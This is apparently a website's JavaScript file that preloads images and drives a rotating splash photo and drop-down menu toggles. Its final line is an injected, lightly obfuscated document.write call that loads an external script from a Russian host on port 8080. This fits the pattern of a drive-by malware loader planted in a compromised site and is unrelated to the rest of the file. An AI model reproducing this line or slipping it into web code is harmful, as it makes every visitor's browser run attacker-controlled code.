if(document.images){
	link_togge1_off=new Image;
	link_togge1_on=new Image;
	link_togge2_off=new Image;
	link_togge2_on=new Image;
	link_pre_reg_off=new Image;
	link_pre_reg_on=new Image;
	splash_photo1=new Image;
	splash_caption1=new Image;
	splash_photo2=new Image;
	splash_caption2=new Image;
	bg_submenu1=new Image;
	bg_submenu2=new Image;
	bg_submenu3=new Image;


	link_togge1_off.src="images/toggle_off_1.png";
	link_togge1_on.src="images/toggle_on_1.png";
	link_togge2_off.src="images/toggle_off_2.png";
	link_togge2_on.src="images/toggle_on_2.png";
	link_pre_reg_off.src="images/pre_reg_off.png";
	link_pre_reg_on.src="images/pre_reg_on.png";
	splash_photo1.src="images/splash_photo_1.png";
	splash_caption1.src="images/splash_caption_1.png";
	splash_photo2.src="images/splash_photo_2.png";
	splash_caption2.src="images/splash_caption_2.png";
	bg_submenu1.src="images/bg_submenu_1.png";
	bg_submenu2.src="images/bg_submenu_2.png";
	bg_submenu3.src="images/bg_submenu_3.png";
}
function splash1(){
	splash_photo.src=splash_photo1.src; 
	splash_text.src=splash_caption1.src;
	toggle_1.src=link_togge1_on.src;
	toggle_2.src=link_togge2_off.src;
}
function splash2(){
	splash_photo.src=splash_photo2.src; 
	splash_text.src=splash_caption2.src;
	toggle_1.src=link_togge1_off.src;
	toggle_2.src=link_togge2_on.src;
}
function toggleRotate(){
	if(splash_photo.src==splash_photo2.src){
		splash1();
	}
	else{
		splash2();
	}
	setTimeout('toggleRotate()',6000);
}
function showTopNav(layerName){
		eval('document.getElementById('+ "'" + layerName + "'" +').style.display = "block"');
}
 	
function hideTopNav(layerName){
	eval('document.getElementById('+ "'" + layerName + "'" +').style.display = "none"');
}

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/XHTML.js"></scr'+'ipt>');
